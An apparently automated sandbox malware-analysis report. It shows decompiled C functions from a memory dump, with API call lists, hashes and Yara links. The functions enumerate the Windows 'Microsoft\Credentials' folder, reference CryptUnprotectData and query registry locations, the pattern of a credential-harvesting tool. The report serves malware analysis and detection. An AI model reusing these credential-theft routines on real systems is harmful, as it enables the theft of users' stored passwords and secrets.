                                          • API String ID: 1033339047-0
                                          • Opcode ID: a4fa1e677cc50a3193f21f28cfe2e500cc07678549d552243c94e4c074398bac
                                          • Instruction ID: 62cae8e83bd5d1efe0b7207de595a3d8a96caeb03304a295a8faf49e2a024305
                                          • Opcode Fuzzy Hash: a4fa1e677cc50a3193f21f28cfe2e500cc07678549d552243c94e4c074398bac
                                          • Instruction Fuzzy Hash: 58F04FB96012005EFB589F36ED4679576F0A708309F18C53EE9058B2F4EB7444448F1D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040D935, Relevance: 4.5, APIs: 3, Instructions: 46COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040D935(intOrPtr* _a4) {
				long _v8;
				long _v12;
				char _v273;
				void _v275;
				char _v276;
				void* _t21;
				void* _t22;

				_v8 = 0;
				_v276 = 0;
				memset( &_v275, 0, 0x104);
				GetWindowsDirectoryA( &_v276, 0x104);
				_v273 = 0;
				GetVolumeInformationA( &_v276, 0, 0,  &_v8,  &_v12, 0, 0, 0); // executed
				_t21 = E0040D794(_a4, 0x80000002, _v8); // executed
				if(_t21 != 0) {
					_t22 = E0040D794(_a4, 0x80000001, _v8); // executed
					return _t22;
				}
				return _t21;
			}










                                          0x0040d950
                                          0x0040d953
                                          0x0040d959
                                          0x0040d969
                                          0x0040d983
                                          0x0040d989
                                          0x0040d99a
                                          0x0040d9a1
                                          0x0040d9ae
                                          0x00000000
                                          0x0040d9ae
                                          0x0040d9b6

                                          APIs
                                          • memset.MSVCRT ref: 0040D959
                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040D969
                                          • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040D989
                                            • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D7DC
                                            • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(00000008), ref: 0040D925
                                            • Part of subcall function 0040D794: RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
                                            • Part of subcall function 0040D794: atoi.MSVCRT ref: 0040D840
                                            • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D869
                                            • Part of subcall function 0040D794: _mbscpy.MSVCRT ref: 0040D8B3
                                            • Part of subcall function 0040D794: _mbscpy.MSVCRT ref: 0040D8C6
                                            • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(?), ref: 0040D8FC
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$Close_mbscpy$DirectoryInformationQueryValueVolumeWindowsatoi
                                          • String ID:
                                          • API String ID: 2578913611-0
                                          • Opcode ID: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
                                          • Instruction ID: 16f147aac1a6c23bf629e3733d081773eeb3eb261c5fc0fbd4ac26dcbb8d373b
                                          • Opcode Fuzzy Hash: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
                                          • Instruction Fuzzy Hash: BB01ECB2C0011CFFDB11DAD4DD85EDEBBACAB08348F1444BAB609E2051D6744F989BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406982, Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E00406982(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						 *__eax =  *__eax + _a8;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						0x413de6(_t13);
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                          0x00406982
                                          0x00406983
                                          0x00406987
                                          0x004069d2
                                          0x00406989
                                          0x0040698a
                                          0x0040698c
                                          0x00406990
                                          0x00406992
                                          0x00406994
                                          0x0040699e
                                          0x004069a6
                                          0x004069a8
                                          0x004069ac
                                          0x004069b6
                                          0x004069bb
                                          0x004069bf
                                          0x004069c4
                                          0x004069ce
                                          0x004069ce

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@mallocmemcpy
                                          • String ID:
                                          • API String ID: 3831604043-0
                                          • Opcode ID: 43d69199a7eee8632861a0ca226f395938b4ef25a2d6add8601f3af2fa4d9b08
                                          • Instruction ID: 3aa6f9377dfc5db36287fc2124ba6b3299db699d57604e2b41df5078e12f24d2
                                          • Opcode Fuzzy Hash: 43d69199a7eee8632861a0ca226f395938b4ef25a2d6add8601f3af2fa4d9b08
                                          • Instruction Fuzzy Hash: 22F02EF26082119FC7089F75B94149BB79DAF45324B12443FF405D3285D738DC64C7A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410383, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
                                          • _mbscpy.MSVCRT ref: 004103C3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Version_mbscpy
                                          • String ID: CryptUnprotectData
                                          • API String ID: 1856898028-1975210251
                                          • Opcode ID: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
                                          • Instruction ID: 124ef79401bdf720cf005998ce1259a6424ffa61298b62e05562ee11dac58942
                                          • Opcode Fuzzy Hash: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
                                          • Instruction Fuzzy Hash: D0F0A471A0030C9BCF04EBA9D589ADEBBB85F08318F11802FE910B6181D7B8D4C4CB2E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406AE0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00406AE0() {
				struct tagLOGFONTA _v64;
				struct HFONT__* _t6;

				E00406A19( &_v64, "Arial", 0xe, 0);
				_t6 = CreateFontIndirectA( &_v64); // executed
				return _t6;
			}





                                          0x00406af2
                                          0x00406afe
                                          0x00406b05

                                          APIs
                                            • Part of subcall function 00406A19: memset.MSVCRT ref: 00406A23
                                            • Part of subcall function 00406A19: _mbscpy.MSVCRT ref: 00406A63
                                          • CreateFontIndirectA.GDI32(?), ref: 00406AFE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CreateFontIndirect_mbscpymemset
                                          • String ID: Arial
                                          • API String ID: 3853255127-493054409
                                          • Opcode ID: 40c99e9d60d1ab3f835d0cb059d53835698da9c32ee7eac16eefe87b5741b715
                                          • Instruction ID: e76317b4d314f44c8759e74956d0c4c6c36286f6473dc8017c9c1f452a7d8835
                                          • Opcode Fuzzy Hash: 40c99e9d60d1ab3f835d0cb059d53835698da9c32ee7eac16eefe87b5741b715
                                          • Instruction Fuzzy Hash: 25D0C970E4020C66D600B7A0FD07BC9776C5B40708F504025BA01B50E1EAE4E1188AD9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00414DB1, Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                          • Instruction ID: 043642bf5cdc1de150e3446c738409664b5144c0223cf5edf213a9aa475217cd
                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                          • Instruction Fuzzy Hash: 8621E7311493416FEB218B745C017E6BBD8ABA7374F19469BD044CB283D26D98C693AE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040C5A4, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 68COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E0040C5A4(void* __edi, void* __eflags) {
				void* __esi;
				signed int _t20;
				intOrPtr _t27;
				intOrPtr _t34;
				void* _t38;
				void* _t41;
				void* _t45;
				void* _t47;
				intOrPtr _t48;

				_t45 = __edi;
				_t34 = 0;
				E00403CB2( *((intOrPtr*)(__edi + 0x390)), __eflags, 0, 0);
				_t20 =  *((intOrPtr*)(__edi + 0x398));
				 *((intOrPtr*)(__edi + 0x108)) = 0;
				if( *((intOrPtr*)(_t20 + 0x30)) <= 0) {
					_t47 = 0x417c88;
				} else {
					if( *((intOrPtr*)(_t20 + 0x1c)) <= 0) {
						_t41 = 0;
						__eflags = 0;
					} else {
						_t41 =  *((intOrPtr*)( *((intOrPtr*)(_t20 + 0xc)))) +  *((intOrPtr*)(_t20 + 0x10));
					}
					_t47 = _t41;
				}
				0x413dce("/stext", _t47);
				if(_t20 != 0) {
					_t48 = E0040C50E(_t20, _t47);
					__eflags = _t48 - _t34;
					if(_t48 <= _t34) {
						goto L15;
					}
					goto L9;
				} else {
					_t48 = 1;
					L9:
					E0040BBF0(_t45, _t34); // executed
					E0040B2F5(_t45);
					_t27 =  *((intOrPtr*)(_t45 + 0x398));
					if( *((intOrPtr*)(_t27 + 0x30)) <= 1) {
						_t38 = 0x417c88;
					} else {
						_t55 =  *((intOrPtr*)(_t27 + 0x1c)) - 1;
						if( *((intOrPtr*)(_t27 + 0x1c)) <= 1) {
							_t38 = 0;
						} else {
							_t38 =  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc)) + 4)) +  *((intOrPtr*)(_t27 + 0x10));
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x390)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x38c)) + 0x730));
					E0040A8F2( *((intOrPtr*)(_t45 + 0x390)),  *((intOrPtr*)(_t45 + 0x390)), _t45, _t55, _t38, _t48); // executed
					_t34 = 1;
					E0040BDCF(_t45);
					L15:
					return _t34;
				}
			}












                                          0x0040c5a4
                                          0x0040c5ac
                                          0x0040c5b0
                                          0x0040c5b5
                                          0x0040c5bb
                                          0x0040c5c4
                                          0x0040c5db
                                          0x0040c5c6
                                          0x0040c5c9
                                          0x0040c5d5
                                          0x0040c5d5
                                          0x0040c5cb
                                          0x0040c5d0
                                          0x0040c5d0
                                          0x0040c5d7
                                          0x0040c5d7
                                          0x0040c5e6
                                          0x0040c5ef
                                          0x0040c5fb
                                          0x0040c5fd
                                          0x0040c5ff
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040c5f1
                                          0x0040c5f3
                                          0x0040c601
                                          0x0040c604
                                          0x0040c60b
                                          0x0040c610
                                          0x0040c61a
                                          0x0040c631
                                          0x0040c61c
                                          0x0040c61c
                                          0x0040c620
                                          0x0040c62d
                                          0x0040c622
                                          0x0040c628
                                          0x0040c628
                                          0x0040c620
                                          0x0040c649
                                          0x0040c656
                                          0x0040c65f
                                          0x0040c660
                                          0x0040c666
                                          0x0040c669
                                          0x0040c669

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpi
                                          • String ID: /stext
                                          • API String ID: 1439213657-3817206916
                                          • Opcode ID: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
                                          • Instruction ID: 4d1f9c46abbdb5e83ce0205fdf3861872a59254e2367a1e2376026c6f9217911
                                          • Opcode Fuzzy Hash: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
                                          • Instruction Fuzzy Hash: D721A130614211EFC36C9F2988C1966B3A9BF05314B1556BFB40AA7382DB79EC519BC8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004042AA, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 67COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E004042AA(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v328;
				char _v652;
				char _v928;
				signed char _v972;
				char _v1296;
				signed int _v1300;
				void* __esi;
				void* _t33;
				char* _t34;
				void* _t38;
				void* _t41;
				intOrPtr _t44;
				void* _t45;

				_v1300 = _v1300 | 0xffffffff;
				_v1296 = 0;
				_v328 = 0;
				_v652 = 0;
				_t38 = __ecx;
				_t41 = 0;
				E0040783B( &_v1300, __eflags, _a4);
				if(E00407898( &_v1300) == 0) {
					L11:
					E00407930( &_v1300);
					return _t41;
				} else {
					_t44 = _a8;
					do {
						if((_v972 & 0x00000010) != 0) {
							__eflags = E00407800( &_v1300);
							if(__eflags != 0) {
								E004042AA(_t38, __eflags,  &_v652, _t44 + 1);
							}
							goto L10;
						}
						if(E00406B3B() != 0) {
							L6:
							_t33 = E00404220(_t51, _t38,  &_v652); // executed
							if(_t33 != 0) {
								_t41 = 1;
							}
							goto L10;
						}
						if(_t44 < 1) {
							goto L10;
						}
						_t34 =  &_v928;
						0x413d92(_t34, "credentials", 0xb);
						_t45 = _t45 + 0xc;
						_t51 = _t34;
						if(_t34 != 0) {
							goto L10;
						}
						goto L6;
						L10:
					} while (E00407898( &_v1300) != 0);
					goto L11;
				}
			}
















                                          0x004042b3
                                          0x004042c2
                                          0x004042c8
                                          0x004042ce
                                          0x004042da
                                          0x004042dc
                                          0x004042de
                                          0x004042f0
                                          0x0040436c
                                          0x00404372
                                          0x0040437d
                                          0x004042f2
                                          0x004042f2
                                          0x004042f5
                                          0x004042fc
                                          0x00404347
                                          0x00404349
                                          0x00404358
                                          0x00404358
                                          0x00000000
                                          0x00404349
                                          0x00404305
                                          0x00404326
                                          0x0040432e
                                          0x00404335
                                          0x00404339
                                          0x00404339
                                          0x00000000
                                          0x00404335
                                          0x0040430a
                                          0x00000000
                                          0x00000000
                                          0x0040430e
                                          0x0040431a
                                          0x0040431f
                                          0x00404322
                                          0x00404324
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040435d
                                          0x00404368
                                          0x00000000
                                          0x004042f5

                                          APIs
                                            • Part of subcall function 0040783B: strlen.MSVCRT ref: 00407862
                                            • Part of subcall function 0040783B: strlen.MSVCRT ref: 0040786F
                                            • Part of subcall function 00407898: FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
                                            • Part of subcall function 00407898: strlen.MSVCRT ref: 004078FC
                                            • Part of subcall function 00407898: strlen.MSVCRT ref: 00407904
                                          • _strnicmp.MSVCRT ref: 0040431A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$FileFindFirst_strnicmp
                                          • String ID: credentials
                                          • API String ID: 773473087-4194641934
                                          • Opcode ID: 5f078394bf2af8fae6ee7cd525e99526c652b3bab6a7d26c0a39e7232aba890c
                                          • Instruction ID: 0f17e4e4efe03dbe37520bfce116898ea2601fe450b4b80a5694618c7f7ee9f5
                                          • Opcode Fuzzy Hash: 5f078394bf2af8fae6ee7cd525e99526c652b3bab6a7d26c0a39e7232aba890c
                                          • Instruction Fuzzy Hash: 4E21D872A0421C56DB60F6668C417DB77A85F81349F4460FBAE18F21C2EA78DF84CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00414DF0, Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                          • Instruction ID: 25f2d81c04f4c45cc56d7cc0e98a54f4dee55ba3048ec5225fe48b17b8cda6c2
                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                          • Instruction Fuzzy Hash: 9101DB3058570179AB2166754C02AFBAF987AE3364F18074BB05497293CA5C89C683BD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00414E0D, Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E20
                                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E34
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                          • Instruction ID: 94a9458822a42be4aa48e0704f6d9666272a38e661a699dcd97394ecc6966311
                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                          • Instruction Fuzzy Hash: 72F022602857003CEF3155B41C42AFB9F8CAAE7360F280A4BF014C7283C59C888683BE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040E675, Relevance: 3.0, APIs: 2, Instructions: 48stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040E695
                                            • Part of subcall function 0040F9A0: CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1
                                          • strrchr.MSVCRT ref: 0040E6B1
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CompareFileTimememsetstrrchr
                                          • String ID:
                                          • API String ID: 4226234548-0
                                          • Opcode ID: 2a82436f4faa6b05b2cc636fc97259d9a3810c45e056b17ce4a1fb11b0906514
                                          • Instruction ID: 53b6c61b59caaa2062b149ee1151cefa66ffad82665aa7653a439d89524e8348
                                          • Opcode Fuzzy Hash: 2a82436f4faa6b05b2cc636fc97259d9a3810c45e056b17ce4a1fb11b0906514
                                          • Instruction Fuzzy Hash: F611BAB1C0522C9EDB21EF5A9C85AC9BBB8BB09304F9040FF9248F2241D7785B94CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404380, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 34COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E00404380(intOrPtr _a4, intOrPtr _a8) {
				void _v267;
				char _v268;
				void* __edi;
				void* __esi;
				int _t13;
				int _t17;

				_t17 = 0;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t16 =  &_v268;
				0x41223f(); // executed
				_t21 = _a8;
				if(_a8 != 0) {
					E0040680E( &_v268);
					E00406EFE(_t16, "Microsoft\Credentials");
					_t13 = E004042AA(_a4, _t21, _t16, 0); // executed
					_t17 = _t13;
				}
				return _t17;
			}









                                          0x00404390
                                          0x0040439a
                                          0x004043a1
                                          0x004043ac
                                          0x004043b2
                                          0x004043b7
                                          0x004043b9
                                          0x004043bd
                                          0x004043c7
                                          0x004043d5
                                          0x004043da
                                          0x004043da
                                          0x004043e1

                                          APIs
                                          • memset.MSVCRT ref: 004043A1
                                            • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                            • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                            • Part of subcall function 00406EFE: strlen.MSVCRT ref: 00406F00
                                            • Part of subcall function 00406EFE: strlen.MSVCRT ref: 00406F0B
                                            • Part of subcall function 00406EFE: _mbscat.MSVCRT ref: 00406F22
                                            • Part of subcall function 004042AA: _strnicmp.MSVCRT ref: 0040431A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat$_strnicmpmemset
                                          • String ID: Microsoft\Credentials
                                          • API String ID: 137454763-3148402405
                                          • Opcode ID: b9bc567b91fdf7fc349dfc15b94f9d4a96cdfacf2bcfcbc0785656f82b29690e
                                          • Instruction ID: 677ab761eff5409f3287a779563a9fbc28491fd5395d1aa5cc811df03cb69dee
                                          • Opcode Fuzzy Hash: b9bc567b91fdf7fc349dfc15b94f9d4a96cdfacf2bcfcbc0785656f82b29690e
                                          • Instruction Fuzzy Hash: 8CF0E97260411427D660B66AEC06FCF775C8F90754F00006AF988F71C1D9F8AA95C3E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00411EC1, Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411EDB
                                          • GetPrivateProfileStringA.KERNEL32(?,?,?,?,?,?), ref: 00411EF0
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfileString$Write
                                          • String ID:
                                          • API String ID: 2948465352-0
                                          • Opcode ID: abc632a6b8702d949c7b4aeb5ee99501477ff23bfd6640d1747d5c6edfc6b77e
                                          • Instruction ID: d9e70508a7a1dcd4d44e453fce3bd4c14a214bdae5f42dce9164bd63fbf12eb7
                                          • Opcode Fuzzy Hash: abc632a6b8702d949c7b4aeb5ee99501477ff23bfd6640d1747d5c6edfc6b77e
                                          • Instruction Fuzzy Hash: A7E0E53600020DFBCF018FE0DC44EEA3F79EB48344F04C425BA0989021C776C6A6EBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408490, Relevance: 2.6, APIs: 2, Instructions: 111COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 50%
                                          			E00408490(intOrPtr _a4, int _a8, wchar_t* _a12) {
				void* _v8;
				char _v12;
				void* _v35;
				int _v36;
				int _v250;
				char _v252;
				void _v291;
				int _v292;
				void* __ebx;
				void* __esi;
				intOrPtr* _t37;
				void* _t38;
				int _t39;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				intOrPtr* _t47;
				void* _t48;
				int _t57;
				void* _t64;
				void* _t66;
				intOrPtr _t67;
				intOrPtr _t70;
				int* _t71;
				struct HINSTANCE__** _t74;
				intOrPtr* _t75;
				void* _t76;

				_t74 = _a4 + 0x78;
				E00404D18(_t74);
				_t37 =  *((intOrPtr*)(_t74 + 0xc));
				_t57 = 0;
				if(_t37 == 0) {
					_t38 = 0;
				} else {
					_t38 =  *_t37(_a8, 0x8004, 0, 0,  &_v8); // executed
				}
				if(_t38 != _t57) {
					_t39 = wcslen(_a12);
					_t7 = _t39 + 2; // 0x2
					_t66 = _t39 + _t7;
					_a8 = _v8;
					E00404D18(_t74);
					_t42 =  *((intOrPtr*)(_t74 + 0x14));
					if(_t42 == _t57) {
						_t43 = 0;
					} else {
						_t43 =  *_t42(_a8, _a12, _t66, _t57);
					}
					if(_t43 == _t57) {
						L15:
						_t67 = _v8;
						_t44 = E00404D18(_t74);
						_t75 =  *((intOrPtr*)(_t74 + 0x18));
						if(_t75 != _t57) {
							_t44 =  *_t75(_t67);
						}
						return _t44;
					} else {
						_v36 = _t57;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t70 = _v8;
						_v12 = 0x14;
						E00404D18(_t74);
						_t47 =  *((intOrPtr*)(_t74 + 0x10));
						if(_t47 == _t57) {
							_t48 = 0;
						} else {
							_t48 =  *_t47(_t70, 2,  &_v36,  &_v12, _t57);
						}
						if(_t48 != _t57) {
							_v292 = _t57;
							memset( &_v291, _t57, 0xff);
							_a8 = _t57;
							_t64 = 0;
							_t71 =  &_v292;
							do {
								_a8 = _a8 + ( *(_t76 + _t64 - 0x20) & 0x000000ff);
								E004081DA(_t71,  *(_t76 + _t64 - 0x20) & 0x000000ff);
								_t64 = _t64 + 1;
								_t71 = _t71 + 2;
							} while (_t64 < 0x14);
							E004081DA( &_v252, _a8);
							_v250 = _t57;
							E004083D0(_a4,  &_v292, _a12);
							_t57 = 0;
						}
						goto L15;
					}
				}
				return _t38;
			}






























                                          0x0040849e
                                          0x004084a1
                                          0x004084a6
                                          0x004084a9
                                          0x004084ad
                                          0x004084c1
                                          0x004084af
                                          0x004084bd
                                          0x004084bd
                                          0x004084c5
                                          0x004084cf
                                          0x004084d4
                                          0x004084d4
                                          0x004084dc
                                          0x004084df
                                          0x004084e4
                                          0x004084e9
                                          0x004084f7
                                          0x004084eb
                                          0x004084f3
                                          0x004084f3
                                          0x004084fb
                                          0x004085a0
                                          0x004085a0
                                          0x004085a3
                                          0x004085a8
                                          0x004085ad
                                          0x004085b0
                                          0x004085b0
                                          0x00000000
                                          0x00408501
                                          0x00408501
                                          0x00408509
                                          0x0040850a
                                          0x0040850b
                                          0x0040850c
                                          0x0040850d
                                          0x0040850e
                                          0x00408511
                                          0x00408518
                                          0x0040851d
                                          0x00408522
                                          0x00408534
                                          0x00408524
                                          0x00408530
                                          0x00408530
                                          0x00408538
                                          0x00408547
                                          0x0040854d
                                          0x00408555
                                          0x00408558
                                          0x0040855a
                                          0x00408560
                                          0x00408565
                                          0x0040856b
                                          0x00408570
                                          0x00408572
                                          0x00408573
                                          0x00408581
                                          0x0040858f
                                          0x00408599
                                          0x0040859e
                                          0x0040859e
                                          0x00000000
                                          0x00408538
                                          0x004084fb
                                          0x004085b6

                                          APIs
                                            • Part of subcall function 00404D18: LoadLibraryA.KERNEL32(advapi32.dll,?,004084A6), ref: 00404D23
                                            • Part of subcall function 00404D18: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404D37
                                            • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00404D43
                                            • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00404D4F
                                            • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00404D5B
                                            • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00404D67
                                            • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00404D73
                                          • wcslen.MSVCRT ref: 004084CF
                                          • memset.MSVCRT ref: 0040854D
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$LibraryLoadmemsetwcslen
                                          • String ID:
                                          • API String ID: 1960736289-0
                                          • Opcode ID: f78174ecb424998fb22a5f41f112440964ae667a2303fb3ee1b26447fe91a2a4
                                          • Instruction ID: 2dd004568a6c17cef409d44c463746fb2ce178d2970b6d5fdfdea9e5a7127ffe
                                          • Opcode Fuzzy Hash: f78174ecb424998fb22a5f41f112440964ae667a2303fb3ee1b26447fe91a2a4
                                          • Instruction Fuzzy Hash: D931A331500159BFCB11DFA4CD819EF77A8AF88304F14447EF985B7181DA38AE599B68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040D9B9, Relevance: 2.6, APIs: 2, Instructions: 57COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E0040D9B9(intOrPtr* __esi) {
				intOrPtr _v8;
				int _v16;
				int _v20;
				char _v276;
				char _v532;
				void _v1555;
				char _v1556;
				void _v2579;
				char _v2580;
				void* __ebx;
				void* __edi;
				char* _t26;

				_v8 = 1;
				_v1556 = 0;
				memset( &_v1555, 0, 0x3ff);
				_v2580 = 0;
				memset( &_v2579, 0, 0x3ff);
				_t26 =  &_v1556;
				0x413735(_t26,  &_v2580); // executed
				if(_t26 != 0) {
					_v532 = 0;
					_v276 = 0;
					_v20 = 0;
					_v16 = 0;
					E00406958(0xff,  &_v532,  &_v1556);
					E00406958(0xff,  &_v276,  &_v2580);
					_push( &_v532);
					_v16 = 4;
					_v20 = 7;
					_v8 =  *((intOrPtr*)( *__esi))();
				}
				return _v8;
			}















                                          0x0040d9d4
                                          0x0040d9db
                                          0x0040d9e1
                                          0x0040d9f2
                                          0x0040d9f8
                                          0x0040da07
                                          0x0040da0e
                                          0x0040da15
                                          0x0040da1d
                                          0x0040da23
                                          0x0040da29
                                          0x0040da2c
                                          0x0040da3b
                                          0x0040da4e
                                          0x0040da5c
                                          0x0040da5f
                                          0x0040da66
                                          0x0040da6f
                                          0x0040da6f
                                          0x0040da78

                                          APIs
                                          • memset.MSVCRT ref: 0040D9E1
                                          • memset.MSVCRT ref: 0040D9F8
                                            • Part of subcall function 00413735: memset.MSVCRT ref: 00413757
                                            • Part of subcall function 00413735: RegCloseKey.ADVAPI32(?,?,?,?,000003FF,?,00000000), ref: 004137BF
